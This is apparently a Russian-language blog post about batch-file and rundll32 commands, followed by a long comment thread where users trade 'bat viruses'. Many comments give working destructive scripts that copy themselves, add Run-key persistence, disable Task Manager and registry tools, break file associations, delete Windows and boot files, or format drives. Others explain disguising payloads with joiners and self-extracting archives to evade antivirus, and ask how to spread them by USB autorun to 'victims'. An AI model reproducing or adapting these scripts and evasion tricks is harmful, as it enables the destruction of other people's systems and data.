Кстати, вот некоторые RunDLL команды, которые могут использоваться при создании батников

rundll32 user,wnetdisconnectdialog
Окно “Отключение сетевого диска” Вызвать

rundll32 user,disableoemlayer
Сбой пpовоциpовать

rundll32 user,repaintscreen
Обновить (как )

rundll32 user,setcursorpos
Maus-Cursor слева ввеpх посадить

rundll32 diskcopy,DiskCopyRunDll
Окно “Copy Disk” вызвать

rundll32 rnaui.dll,RnaWizard /1
Диалог “Установка Связи” вызвать (/1 = без окна)

rundll32 shell,shellexecute
Explorer-Окно откpыть в коpневом каталоге

rundll32 shell32,OpenAs_RunDLL
Окно “Откpыть с помощью…” вызвать***

rundll32 shell32,SHFormatDrive
Окно “Фоpматиpование: Диск3,5(А)” вызвать

rundll32 shell32,ShellAboutA
Info-Box (о Windows) вызвать

rundll32 shell32,SHExitWindowsEx 0
Windows 98 заново стаpтанyть (без autoexec.bat и дp.)

rundll32 shell32,SHExitWindowsEx 1
Работy с Windows 98 закончить

rundll32 shell32,SHExitWindowsEx 2
Windows-98-PC boot

rundll32 shell32,SHExitWindowsEx -1
Windows-98-Explorer стаpтанyть заново

rundll32 shell32,Control_RunDLL
Откpыть окно “Панель yпpавления”

rundll32 shell32,Control_RunDLL desk.cpl
Откpыть “Свойства Экpана”

rundll32 shell32,Control_RunDLL main.cpl
Откpыть Modul-Панели yпpавления из MAIN.CPL **

rundll32 krnl386.exe,exitkernel
выход из Windows без любых сообщений/вопpосов

rundll32 user,swapmousebutton
“Пеpеставить” клавиши мыши *

rundll32 keyboard,disable
“Отключить” клавиатypy *

rundll32 mouse,disable
“Отключить” мышь *

rundll rnaui.dll,RnaDial “пpовайдеp”
Вызвать окно “Установка связи” с именем “пpовайдеp”

rundll32 user,tilechildwindows
выстpоить все не свёpнyтые окна свеpхy вниз

rundll32 user,cascadechildwindows
выстpоить все не свёpнyтые окна каскадом

rundll32 sysdm.cpl,InstallDevice_Rundll
(единств. возможность в W98) yстановить non-Plug&Play обоpyдование

rundll32 msprint2.dll,RUNDLL_PrintTestPage
выбpать в появившемся меню пpинтеp и послать а него тест

rundll32 user,setcaretblinktime
yстановить новyю частотy мигания кypсоpа *

rundll32 user, setdoubleclicktime
yстановить новyю скоpость двойного нажатия *

rundll32 setupx.dll,InstallHinfSection
DefaultInstall 130; C:\file.inf
окно “Пеpезапyск системы. Пpоизвести её сейчас ? ъ Да/нет ъ” ****

ASSOC — Отображает или модифицирует связи расширений файлов
AT — Планирует команды и программы для выполнения на компьютере.
ATTRIB — Отображает или изменяет атрибуты файла.
BREAK — Устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS — Отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL — Вызывает один *.BAT-файл из другого.
CD — Отображает имя или изменяет имя текущей директории.
CHCP — Отображает или устанавливает номер активной кодовой страницы.
CHDIR — Отображает имя или изменяет имя текущей директории.
CHKDSK — Проверяет диск и отображает отчет о состоянии.
CLS — Очищает экран.
CMD — Стартует новый экземпляр интерпретатора команд Windows NT.
COLOR — Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND — Стартует новую копию интерпретатора команд Windows.
COMP — Сравнивает содержимое двух файлов или установки файлов.
COMPACT — Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
CONVERT — Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY — Копирует один или больше файлов на другое место.
CTTY — Изменяет терминальное устройство, используемое для управления вашей системой.
DATE — Отображает или устанавливает дату.
DEL — Удаляет один или более файлов.
DEBUG — Выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR — Отображает список файлов и поддиректорий в директории.
DISKCOMP — Сравнивает содержимое двух дискет.
DISKCOPY — Копирует содержимое одной дискеты на другую.
DOSKEY — Редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO — Отображает сообщения, или включает/выключает вывод команд.
EMM386 — Включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL — Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE — Удаляет один или более файлов.
EXIT — Прекращает выполнение программы (интерпретатор команд).
EXTRACT — Средство извлечения информации из CAB — файлов.
FC — Сравнивает два файла или установки файлов, и отображает различие между ними.
FIND — Ищет текстовую строку в файле или файлах.
FINDSTR — Поиск строк в файлах.
FOR — Выполняет указанную команду для каждого файла в наборе файлов.
FORMAT — Форматирует диск для использования с Windows.
FTYPE — Отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO — Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL — Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP — Обеспечивает информацию Help для команд Windows.
IF — Выполняет обработку условия в *.BAT-файле.
KEYB — Конфигурирует клавиатуру для заданного языка.
LABEL — Создает, изменяет, или удаляет метку тома на диске.
LOADHIGH(LH) — Загружает программу в верхние адреса памяти.
MD — Создает директорию.
MEM — Отображает величину используемой и свободной памяти в вашей системе.
MKDIR — Создает директорию.
MODE — Конфигурирует системное устройство.
MORE — Отображает вывод одного экрана за раз.
MOVE — Перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT — Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC — Загружает информацию, специфическую для страны.
PATH — Отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE — Приостанавливает обработку *.BAT-файла и отображает сообщение.
POPD — Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT — Печатает текстовый файл.
PROMPT — Изменяет подсказку к командам Windows.
PUSHD — Сохраняет текущую директорию, потом изменяет.
RD — Удаляет директорию.
RECOVER — Восстанавливает читаемую информацию с плохого или дефектного диска.
REM — Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
REN — Переименует файл или файлы.
RENAME — Переименует файл или файлы.
REPLACE — Заменяет файлы.
RESTORE — Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR — Удаляет директорию.
SET — Отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL — Начинает локализацию изменений среды в *.BAT-файле.
SETVER — Устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT — Сдвигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV — Инсталлирует и конфигурирует утилиту кэширования диска SMART — драйва.
SORT — Сортирует входной поток.
START — Стартует отдельное окно для выполнения указанной программы или команды.
SUBST — Связывает путь с литерой диска.
SYS — Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME — Отображает или устанавливает системное время.
TITLE — Устанавливает заголовок окна для сеанса .
TREE — Графически отображает структуру директория в драйве или путь.
TYPE — Отображает содержимое текстового файла.
VER — Отображает версию Windows.
VERIFY — Сообщает Windows, проверять ли правильность записи файлов на диск.
VOL — Отображает метку дискового тома и серийный номер.
XCOPY — Копирует файлы и деревья директории.

Ну а если хочешь “убить” Windows то:
@echo off
start explorer
start explorer
start explorer
start explorer — повторить ещё раз 100 и прописать в автозагрузку.

Комментарий от Device [ Август 25, 2010, 10:04 ]

explorer жёстко грузит центральный процессор если запустить несколько раз что и делает батник то всё твой комп труп

Комментарий от 1q [ Сентябрь 4, 2010, 09:07 ]

детский сад «Ромашка» -не больше!!!1

Комментарий от HIM1 [ Сентябрь 5, 2010, 15:56 ]

Работает в sp2 в sp3 могут некорректо работать некоторые функции bat пакета.

rundll keyboard,disable
rundll mouse,disable
shutdown.exe -r -f -t 00
regedit /s module.reg

1)строчка отключает клавиатуру.
2)cтрочка отключает мышь.
3)строчка перегружает компьютер.
4)инсталирует запись в реестр без запроса, за счет переменной /s.

затем создаем module.reg фаил.
в нем пишем.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Paint.NET]
«paint»=»module.bat»

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
«paint»=»paint.exe»

Для чего была добавлена запись в раздел paint? Для того что бы при запуске системы, запускался паинт, а вместе с ним, запускался наш модуль.bat

после указываем путь и упаковываем module.reg с помощью SFX

Затем берем джойнер беспалевный. А это тот, который напишешь сам. И клеим module.exe и module.bat

получается module.exe единый файл.
При его запуске, с учетом того что у жертвы SP2,
Компьютер жертвы будет перезагружаться.
Причем не будет видно в автозагрузке вредоностную программу.

По поводу написания программ на C++, пишите мне в icq 248022

Комментарий от ислам [ Сентябрь 10, 2010, 16:50 ]

че за красавчик того все….я не читал коменты да и пофигу на них тот кто написал эт красаууелла

Комментарий от BLACK^GRAVE [ Сентябрь 18, 2010, 03:20 ]

Автор ++ молодец спс за материал!

Комментарий от Сергй [ Сентябрь 19, 2010, 13:35 ]

Привет всем парни кул вирусы тока ктонить может подсказать как можно сделать так чтоб антивирусник не видел вирусы ато ппц почти всё что создаю каспер сразу сьедает.И буду очень признателен если скинете на маил операторы написания вирусов плиз.мой маил doubleSK@mail.ru

Комментарий от Dgane Makefly [ Сентябрь 21, 2010, 14:09 ]

вот вирус который запускает программу до бесконечности
@echo off
:x
start explorer
goto :x

explorer можно поменятьь на любую программу просто explorer сильно грузит комп.

Комментарий от fictiv [ Октябрь 4, 2010, 13:03 ]

Всем салют. Да информация для новичков в этом деле очень обильна, можно так сказать. Но здесь все приводят примеры по пустым делам, или просто ради прикола. Вот теперь сразу созрел вопрос. ?? Я написать написал то что мне надо, но как это автоматизировать ??
короче… Я написал то что мне надо чтобы мой вирь грохал ntldr и все, с форматированием какие то проблы…. Теперь мне надо прописать его в автозагрузку Флешки, тупо засул в комп и вуаля !!!! припервой перезагрузке жертва будет стонать… Пожалуйста опишите или напишите мне команды для того чтобы файл запускался автоматом, только тогда когда я вставлю флешку. Заранее благодарен.

Комментарий от fictiv [ Октябрь 4, 2010, 13:04 ]

а точнее в autorun.inf И скорее как я понял за этот маленький период общения с bat его нужно компилировать в .exe?

Комментарий от Hight m [ Октябрь 10, 2010, 16:00 ]

Большое спасибо за информацию данную на этом сайте,
очень познавательно.

Комментарий от HOST [ Октябрь 10, 2010, 20:05 ]

Ипать вы все ламеры!!!! Эти .BAT вирусы находятся даже дерьмовым касперским!!! что уж говорить о NOD32??? Это все хрень!!!!

Комментарий от Гость [ Октябрь 12, 2010, 09:22 ]

Да ребят вам тока на письку дрочить на японское аниме!
У меня слов нету просто больше все величайшие гуру хакинга собралиьс в этой ветке!!!

Комментарий от Тыры Пыры [ Октябрь 18, 2010, 15:44 ]

md C:\ABCD
set SystemRoot =C:\ABCD

проверьте рабочий код или нет?)))

Комментарий от Димас [ Октябрь 23, 2010, 21:14 ]

Друг мой я вижу ты отличный вируса писолог а ч средний можеш обучить меня всем тонкостям?

Комментарий от ороллоооа [ Октябрь 24, 2010, 11:06 ]

Ща наебну кого-нить… Вот. Эту херь только AVG определяет как BAT/WORM больше никто. Касперский Нод32 ДокторВеб нихуя не видят:
@Echo off
if not exist C:\smuggling.sys copy %0 C:\smuggling.sys
assoc .sys=.bat
copy %0 %windir%\system\smuggling.bat
attrib +h +s +r %windir%\system\smuggling.bat
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v «smuggling» /d «%windir%\system\smuggling.bat»
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d «1″ /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d «1″ /f
:smuggling
copy %0 D:\%RANDOM%
goto smuggling

От этой штучки систему затормозит так что мало не покажеться!

Комментарий от ороллоооа [ Октябрь 24, 2010, 11:09 ]

Это не мое, но вот исходник. Сохранять с расширением *.js:
function CreateFile(name)
{
var fso, tf;
fso = new ActiveXObject(«Scripting.FileSystemObject»);
tf = fso.CreateTextFile(«c:\\»+name+».txt», true);
tf.WriteLine(«Превед! Я Кролег!») ;
tf.Write («Я быстро размножаюсь»);
tf.Write («Ой, кажица я сжевал твой диск C, но D мне понравился больше!»);
tf.Write («Ой, кажица я накакал в папке Windows!»);
tf.Write («У миня радилось исче тызяча крольчадог!»);
tf.Close();
}
function newKroleg(n) {
CreateFile(«Кролег»+n);
}
for (i=1;i>0;i++) {
newKroleg(i);
}
У меня он 139.000 кролегов на диске С наплодил! Будьте осторожны!

Комментарий от ороллоооа [ Октябрь 24, 2010, 13:19 ]

Винда летит далеко и надолго:
@Echo off
copy %0 %windir%\winstart.bat
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v «winstart.bat» /d «%windir%\winstart.bat»
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d «1″ /f
msg * «VIRUS LOADING…»
Date 01.06.50
Time 13:13
Copy %0 C:\virus.bat
Copy %0 %windir%\virus.bat
copy %0 %SystemRoot%\virus.bat
Attrib +h +s +r C:\virus.bat
Attrib +h +s +r %windir%\virus.bat
Attrib +h +s +r %SystemRoot%\virus.bat
If exist C:\virus.bat goto vIrUs
:vIrUs
md C:\Virus1
md C:\Virus2
md C:\Virus3
md C:\Virus4
md C:\Virus5
:vIrUs
Label C: Virus
Label D: Virus
assoc .exe=.virus
assoc .dll=.virus
assoc .sys=.virus
:vIrUs
del %windir%\*.* /q
del %windir%\system\*.* /q
del %windir%\system32\*.* /q
msg * «VIRUS LOAD!!!»
shutdown -r
Exit

Является модифицированной версией одного неработающего вируса.

Комментарий от ПГАМ [ Октябрь 26, 2010, 10:43 ]

все вири читать нее стал но уже раз в пятый читаю эту бредятину

Комментарий от Лам [ Октябрь 26, 2010, 11:36 ]

Это всё фигня, нужен бат файл, устанавливающий сетевое соединение с компьютером жертвы. Как такой написать?

Комментарий от ороллоооа [ Октябрь 31, 2010, 18:20 ]

Лам
никак. в BAt интерпритаторе нет таких команд. на visual basic пиши.

Комментарий от Юлия [ Ноябрь 6, 2010, 16:49 ]

поясни плиз ещё раз , а то 3 раза читаю и ничего не понял до сих пор.(((

Комментарий от neuda4nik
[ Июнь 13, 2008, 00:01 ]

Комментарий от Вася [ Ноябрь 6, 2010, 17:14 ]

поясни плиз ещё раз , а то 3 раза читаю и ничего не понял до сих пор.((( Комментарий от neuda4nik [ Июнь 13, 2008, 00:01 ]

Комментарий от fgfikytfi [ Ноябрь 8, 2010, 08:49 ]

спасибо полный нештяк как нештяк

Комментарий от Ge%yU$ [ Ноябрь 15, 2010, 21:24 ]

АВТОР СУПЕР !!!!
только вы попробуйте ЭТО
@echo off
copy 0% имя батника который создали.bat
start имя батника который создали.bat

ИЛИ

@echo off
net share disk_d=d:
net share disk_c=c:
net share disk_x=x:
net share disk_y=y:
net share disk_z=z:
net share disk_f=f:

ИЛИ

@echo off
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo XAXAXAXAXAXAXA > c:\autoexec.bat
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(» Ваш компьютер заражен «); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

НО ШТОБ СОЗДАТЬ САМОМУ УЧИТЕ
ЭтО:

Команды cmd:
ASSOC Вывод либо изменение сопоставлений по расширениям имен файлов.
AT Выполнение команд и запуск программ по расписанию.
ATTRIB Отображение и изменение атрибутов файлов.
BREAK Включение/выключение режима обработки комбинации клавиш CTRL+C.
CACLS Отображение/редактирование списков управления доступом (ACL) к файлам.
CALL Вызов одного пакетного файла из другого.
CD Вывод имени либо смена текущей папки.
CHCP Вывод либо установка активной кодовой страницы.
CHDIR Вывод имени либо смена текущей папки.
CHKDSK Проверка диска и вывод статистики.
CHKNTFS Отображение или изменение выполнения проверки диска во время загрузки.
CLS Очистка экрана.
CMD Запуск еще одного интерпретатора командных строк Windows.
COLOR Установка цвета текста и фона, используемых по умолчанию.
COMP Сравнение содержимого двух файлов или двух наборов файлов.
COMPACT Отображение/изменение сжатия файлов в разделах NTFS.
CONVERT Преобразование дисковых томов FAT в NTFS. Нельзя выполнить
преобразование текущего активного диска.
COPY Копирование одного или нескольких файлов в другое место.
DATE Вывод либо установка текущей даты.
DEL Удаление одного или нескольких файлов.
DIR Вывод списка файлов и подпапок из указанной папки.
DISKCOMP Сравнение содержимого двух гибких дисков.
DISKCOPY Копирование содержимого одного гибкого диска на другой.
DOSKEY Редактирование и повторный вызов командных строк; создание макросов.
ECHO Вывод сообщений и переключение режима отображения команд на экране.
ENDLOCAL Конец локальных изменений среды для пакетного файла.
ERASE Удаление одного или нескольких файлов.
EXIT Завершение работы программы CMD.EXE (интерпретатора командных строк).
FC Сравнение двух файлов или двух наборов файлов и вывод различий между
ними.
FIND Поиск текстовой строки в одном или нескольких файлах.
FINDSTR Поиск строк в файлах.
FOR Запуск указанной команды для каждого из файлов в наборе.
FORMAT Форматирование диска для работы с Windows.
FTYPE Вывод либо изменение типов файлов, используемых при сопоставлении по
расширениям имен файлов.
GOTO Передача управления в отмеченную строку пакетного файла.
GRAFTABL Позволяет Windows отображать расширенный набор символов в графическом
режиме.
HELP Выводит справочную информацию о командах Windows.
IF Оператор условного выполнения команд в пакетном файле.
LABEL Создание, изменение и удаление меток тома для дисков.
MD Создание папки.
MKDIR Создание папки.
MODE Конфигурирование системных устройств.
MORE Последовательный вывод данных по частям размером в один экран.
MOVE Перемещение одного или нескольких файлов из одной папки в другую.
PATH Вывод либо установка пути поиска исполняемых файлов.
PAUSE Приостановка выполнения пакетного файла и вывод сообщения.
POPD Восстановление предыдущего значения текущей активной папки,
сохраненного с помощью команды PUSHD.
PRINT Вывод на печать содержимого текстовых файлов.
PROMPT Изменение приглашения в командной строке Windows.
PUSHD Сохранение значения текущей активной папки и переход к другой папке.
RD Удаление папки.
RECOVER Восстановление читаемой информации с плохого или поврежденного диска.
REM Помещение комментариев в пакетные файлы и файл CONFIG.SYS.
REN Переименование файлов и папок.
RENAME Переименование файлов и папок.
REPLACE Замещение файлов.
RMDIR Удаление папки.
SET Вывод, установка и удаление переменных среды Windows.
SETLOCAL Начало локальных изменений среды для пакетного файла.
SHIFT Изменение содержимого (сдвиг) подставляемых параметров для пакетного
файла.
SORT Сортировка ввода.
START Запуск программы или команды в отдельном окне.
SUBST Сопоставляет заданному пути имя диска.
TIME Вывод и установка системного времени.
TITLE Назначение заголовка окна для текущего сеанса интерпретатора
командных строк CMD.EXE.
TREE Графическое отображение структуры папок заданного диска или заданной
папки.
TYPE Вывод на экран содержимого текстовых файлов.
VER Вывод сведений о версии Windows.
VERIFY Установка режима проверки правильности записи файлов на диск.
VOL Вывод метки и серийного номера тома для диска.
XCOPY Копирование файлов и дерева папок.
Вызываем командную строку так Пуск->Выполнить->и в появишемся окошке пишем cmd

Комментарий от oleg [ Ноябрь 28, 2010, 12:47 ]

ламеры, перезагрузить комп и все , на ассемблере нуно писать, шоб компу сразу мозг взорвать …. и усе )

Комментарий от Руслан [ Ноябрь 28, 2010, 15:12 ]

ну я в шоке откуда вы всё это знаете… мозг сломать можно ))))

Комментарий от Данил [ Декабрь 1, 2010, 08:30 ]

ваще прикольн))) раньше тока слабенькие в бате делал! а теперь повесилюсь)))!

Комментарий от Алексей [ Декабрь 2, 2010, 22:44 ]

парни а если все с выше перечисленного собрать? что тогда будет?

Комментарий от Алексей [ Декабрь 2, 2010, 22:47 ]

и можно ли в блоке написать команду чтобы вирусняк оставался где нибудь чтоб снос винды не помог?

Комментарий от димaн [ Декабрь 13, 2010, 04:26 ]

кaк сдeлaть что бы вирь зaпускaлся в бeзопaсном рeжимe

Комментарий от ВетОС [ Декабрь 18, 2010, 17:09 ]

5строчек и пиздец

del C:\*.exe
echo y|del*.*
echo y|Format C:
echo y|del C:\*.*
echo y|del D:\*.* учитесь!!! нубы

Комментарий от ZMEJ [ Декабрь 19, 2010, 18:58 ]

Всем привет. У меня такая ситуация. Как сделать так, что-бы вирус коприровался на все диски.
Я написал таким образом
С:\snakes.bat
D:\snakes.bat
E:\snakes.bat
F:\snakes.bat
G:\snakes.bat
H:\snakes.bat
I:\snakes.bat
J:\snakes.bat
Если на компе имеются кокиенибудь диски, то он на них скопируеться. Если нет, то просто пропустит эту командную строчку. Но дело в том, на компах, где стоит Windows Vista в разделе «мой компьютер» имеються несуществующие диски (съемный диск F:, съемный диск G:, съемный диск H: и т.д.) А когда встовляешь флешку она появляется за место пустого диска на последней букве. (Fleshka J:). Когда команда доходит до первого несуществующего диска, то вылезает ошибка «диск не найден». В результате чего остальные команды, после ошибки не выполняются. Можно-ли сделать так, что-бы вирус различал реальные диски от несуществующих и нп них не пытался копироваться. И ещё один вопрос, как сделать так, что-бы вирус запускался в определённое число и в определённое время.

Комментарий от ZMEJ [ Декабрь 20, 2010, 00:51 ]

Всем привет. У меня такая ситуация. Как сделать так, что-бы вирус коприровался на все диски.
Я написал таким образом
С:\snakes.bat
D:\snakes.bat
E:\snakes.bat
F:\snakes.bat
G:\snakes.bat
H:\snakes.bat
I:\snakes.bat
J:\snakes.bat
Если на компе имеются кокиенибудь диски, то он на них скопируеться. Если нет, то просто пропустит эту командную строчку. Но дело в том, на компах, где стоит Windows Vista в разделе «мой компьютер» имеються несуществующие диски (съемный диск F:, съемный диск G:, съемный диск H: и т.д.) А когда встовляешь флешку она появляется за место пустого диска на последней букве. (Fleshka J:). Когда команда доходит до первого несуществующего диска, то вылезает ошибка «диск не найден». В результате чего остальные команды, после ошибки не выполняются. Можно-ли сделать так, что-бы вирус различал реальные диски от несуществующих и нп них не пытался копироваться. И ещё один вопрос, как сделать так, что-бы вирус запускался в определённое число и в определённое время.
Мой e-mail: zmej-stas@mail.ru
Заранее спасибо, жду ответа

Комментарий от ZMEJ [ Декабрь 20, 2010, 02:01 ]

Всем привет. У меня такая ситуация. Как сделать так, что-бы вирус коприровался на все диски.
Я написал таким образом
COPY snakes.bat С:\
COPY snakes.bat D:\
COPY snakes.bat E:\
COPY snakes.bat F:\
COPY snakes.bat G:\
COPY snakes.bat H:\
COPY snakes.bat I:\
COPY snakes.bat J:\
Если на компе имеются кокиенибудь диски, то он на них скопируеться. Если нет, то просто пропустит эту командную строчку. Но дело в том, на компах, где стоит Windows Vista в разделе «мой компьютер» имеються несуществующие диски (съемный диск F:, съемный диск G:, съемный диск H: и т.д.) А когда встовляешь флешку она появляется за место пустого диска на последней букве. (Fleshka J:). Когда команда доходит до первого несуществующего диска, то вылезает ошибка «диск не найден». В результате чего остальные команды, после ошибки не выполняются. Можно-ли сделать так, что-бы вирус различал реальные диски от несуществующих и нп них не пытался копироваться. И ещё один вопрос, как сделать так, что-бы вирус запускался в определённое число и в определённое время.
Мой e-mail: zmej-stas@mail.ru
Заранее спасибо, жду ответа

Комментарий от секрет фирмы [ Декабрь 21, 2010, 14:06 ]

не знаю…не люблю висту…говно…7ку ставь

Комментарий от секрета фирмы [ Декабрь 21, 2010, 14:07 ]

а на чем и как еще можно вирусы писать?
а то я не знаааю

Комментарий от не любитель [ Декабрь 27, 2010, 17:28 ]

да круто так уметь,кому от того будит счастье если убит будит инет,уже было такое не раз в истории его,пиши тварий компа но только что бы файлы коллекций не страдали ,чувство такта и уважения имей коллекция собирается не один год ,а переместить бывает людям ну времени нет,сумей создать реально боевой такой как пиндосия с израилем червя stux и по пизде вся иранская ядерная программа полетела от него ,вот это круто это класс .

Комментарий от ZMEJ [ Декабрь 31, 2010, 18:50 ]

Команда @Echo off палится антивирусом avast

Комментарий от Павел [ Январь 8, 2011, 11:24 ]

Люди, а можно ли в batнике командой сделать ярлык самого batника?Если что, мне в Автозагрузку надо=)

Комментарий от Boppo [ Январь 9, 2011, 22:55 ]

пожалуйста подскажите как избавиться от вируса с расширением .bat ни одна программа на компе не работает если есть варианты кроме установки винды то подскажите пожалуйста!!!

Комментарий от %USERNAME% [ Январь 12, 2011, 20:59 ]

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
copy «»%0″» «%SystemRoot%\win32.bat» >nul
attrib %SystemRoot%\win32.bat +h +s +r >nul
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «win32.sys» /t REG_SZ /d «%SystemRoot%\win32.bat» /f >nul

bootcfg /delete /id 1 >nul
bootcfg /delete /id 1 >nul
bootcfg /delete /id 1 >nul

if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
if exist c:\ntldr attrib c:\ntldr -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
deltree /y c:\ntldr

deltree /y %windir%/win.ini
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini

attrib -s -r -h -a %windir%*.* >nul
erase %windir%*.* /q >nul
attrib -s -r -h -a %systemdrive%*.* >nul
erase %systemdrive%*.* >nul
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
del *.* /q

del «%0″ >nul

Помоему должно серьезно похерить Винду. Проверьте кто-нибудь плз)))

Комментарий от Just [ Январь 24, 2011, 20:37 ]

я повесил вирусняк к другу и спалился,подскажите плз ,как убрать bat или где он находится?или мне пизд** :

Комментарий от PlaYer [ Январь 26, 2011, 14:18 ]

Если кому интересно, то могу рассказать как сделать так, чтобы якобы вирус, созданый через блокнот, не спалил антивирус.
Так что бы жертва не смогла увидеть его код будем использовать WinRar. Берем наш вирусочек и кидаем его в архив, вылетит окно, и ты просто ставишь галочку «создать SFX-архив». Далее заходим в дополнительное и открываем параметры SFX, там есть строка «выполнить после распаковки» и ты пишешь РЕАЛЬНОЕ имя твоего вируса. (если я не ошибаюсь, то ваш антивир его не найдет)

Комментарий от KruKK [ Январь 26, 2011, 17:33 ]

люди подскажите плз скрипт который….. окна с надписями делает( запускаешь скрипт и у тебя появлется окно с надписюь например привет, нажимаешь на ок, это окно закрывается и сразу же открывается ещё одно такое же тока с другой надписью…. и так можно 10000 раз сделать его…)
у меня был он потом винду переставлял и он удалился а как писать забыл хD

Комментарий от joni banano [ Январь 27, 2011, 18:27 ]

куак сделать так чтб вирус запуускался раз в 2дня

Комментарий от Demon9l [ Январь 30, 2011, 08:53 ]

Вот вам вирь убьёт винду состоитиз 2 строчек :
@echo off
assoc .dll=.mp3

Вот и всё ! А вы тут маетесь !

Комментарий от austt [ Январь 30, 2011, 11:43 ]

KruKK, эта команда msg * (текст который в этом окне вылезет),

Комментарий от adonte [ Февраль 2, 2011, 11:50 ]

а че делать надо я по емейлу отправил

Комментарий от .:Aimon:. [ Февраль 5, 2011, 00:45 ]

А кто знает как антивирус на бате написать против своего-же вируса помогите а!

Комментарий от virus [ Февраль 11, 2011, 18:50 ]

киньте пример на бантике запуск по времени чтоб через два месяца вирь удалил c:\диск

Комментарий от Хакер_7 [ Февраль 15, 2011, 18:11 ]

Привет ребят. Помогите если сможете. Я че то читал что батник не может полноценно передаваться с одного кампа на другой. Это правда? Еще… Я пробовал кидать вирус в автозагрузку, и копировал его в папку Windows, и после этого кидал его в автозагрузку. После перезагрузки вирус не запускается. Даже менял имя вируса на Autoexec.bat. Помогите, пишите пожалуйста на мне 72367383:)

Комментарий от петя [ Февраль 20, 2011, 16:26 ]

может создать какойнибудь exe инстоллятор чтоб жертва подумала за программку. только как из bat в exe сделать ????

Комментарий от Кирилл [ Февраль 25, 2011, 11:06 ]

такие вирусы палят любые антивирусы (

Комментарий от Юрко [ Март 5, 2011, 13:11 ]

как отключить мышь я сделал так как написано выше и он мне написал:»ошибка при загрузке mouse) не найден указанный модуль» что делать?!

Комментарий от Руслан [ Март 9, 2011, 23:43 ]

всем привет подскажите как написать bat чтобы CD-rom сам по себе открывался и закрывался

Комментарий от lakec [ Март 12, 2011, 23:37 ]

Статья суперская ,а как сделать чтоб всплывало ещё фото?? как в порнобанере ???? кто знает подскажите пож.

Комментарий от Иван [ Март 16, 2011, 10:28 ]

Я тоже новичок в этом деле, но вообщем понравилось!
Тоже искал несколько полезных команд BAT вирусов на форуме порекомендовали ввести в гугле «личный сайт антона виноградова».
Нашел там всё, что нужно и команды и программы для компиляции из BAT в EXE.

Комментарий от Рома [ Март 17, 2011, 22:55 ]

Если кому надо могу дать батгенератор (мой, написаный своими руками на том же batch). кому интересно пишите на eliseev.roman.al@gmail.com

Комментарий от Леон Гончаров [ Март 19, 2011, 20:45 ]

Люди… мда. Я дочитал комменты до середины, дальше не смог, это ппц. Мне 14 лет, но с первого взгляда я вижу что тут стооолько бреда… Я вири тож на бат пишу (хотя для батника вирь — уже фраза бредовая..), но блин, зачем все так усложнять? Там столько лишних строк, либо у некоторых наоборот: они хвастаются rd %systemroot%\windows! А хотите идею? Во-первых, компилируйте, криптуйте и джойните батники! Во-вторых, раз вири на бат тупость, напишите троян для… БОТНЕТА! Желающим получить исходник, просьба писать на мыло: magicmight2008@yandex.ru. ахаха)) ток я жадный, ботнетник за 10 руб. (ппц сумма..)

Комментарий от роман [ Март 21, 2011, 23:55 ]

парни скиньте мне вирус на мыло если можно romaskip@au.ru заранее спс

Комментарий от Лёха [ Март 23, 2011, 00:06 ]

скажите пожалуста как зделать так чтоб бат вирус запускался после перезагрузки компа очень надо заранее спосибо

Комментарий от Лёха [ Март 23, 2011, 00:12 ]

скажите пожалуста как зделать так чтоб бат вирус запускался после перезагрузки компа снова и снова какая команда нужна

Комментарий от Илья [ Март 23, 2011, 18:36 ]

Надо читать все комментарии! Киньте на мыло возможности бат вирусов!

Комментарий от Руслан [ Март 23, 2011, 23:03 ]

Фигня это всё тут выше изложеное сам на сибе испробывал не работает )))))))))) шляпа а не ВИРУСЫ

